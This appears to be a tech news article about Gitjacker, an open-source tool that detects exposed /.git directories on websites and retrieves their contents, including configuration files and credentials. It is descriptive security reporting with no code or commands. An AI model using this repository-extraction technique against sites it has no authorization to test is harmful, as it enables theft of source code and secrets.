Web developers can accidentally copy their entire Git repository online along with the /.git folder or forget to remove it, thus exposing sensitive information to attackers. This is where a new open-source tool dubbed ‘Gitjacker’ can help.
A .git directory stores all of your Git repository data, such as configuration, commit history, and the actual content of each file in the repository. As a rule of thumb, /.git folders should never be uploaded online.
If someone can access the entire contents of a .git directory of a website, they can retrieve raw source code for that site, and sensitive configuration data like database passwords, password salts, and more.
So, Gitjacker helps developers detect the leaking .git repositories on websites. It was created by a British software engineer Liam Galvin in Go programming language. You can download Gitjacker for free from GitHub.
To explain how Gitjacker works in the simplest terms; it lets users scan a domain and detect all the location of a /.git folder on their production systems.
It can also identify the /.git folders included in automated build chains and added to Docker containers that are later installed as web servers.
Gitjacker Isn’t Just Limited To .git Folders
The tool can not only find /.git folders but also fetch its content like sensitive configuration files within a few keyboard strokes.
Hackers tend to scan the internet for such folders in accidentally exposed systems. They download their content to gain access to configuration data or app’s source code.
Webservers that have directory listings enabled are pretty vulnerable to such kind of attacks. With the directory listings disabled, retrieving a complete repository becomes difficult.
But Gitjacker can handle the download and extraction of a git repository for users, even in cases where web directory listings are disabled.
The developer of Gitjacker says that he made the tool to be used in penetration tests. But owing to its abilities, Gitjacker can also be abused by malicious actors as we know that hackers have a longstanding history of misusing open source tools for their purposes.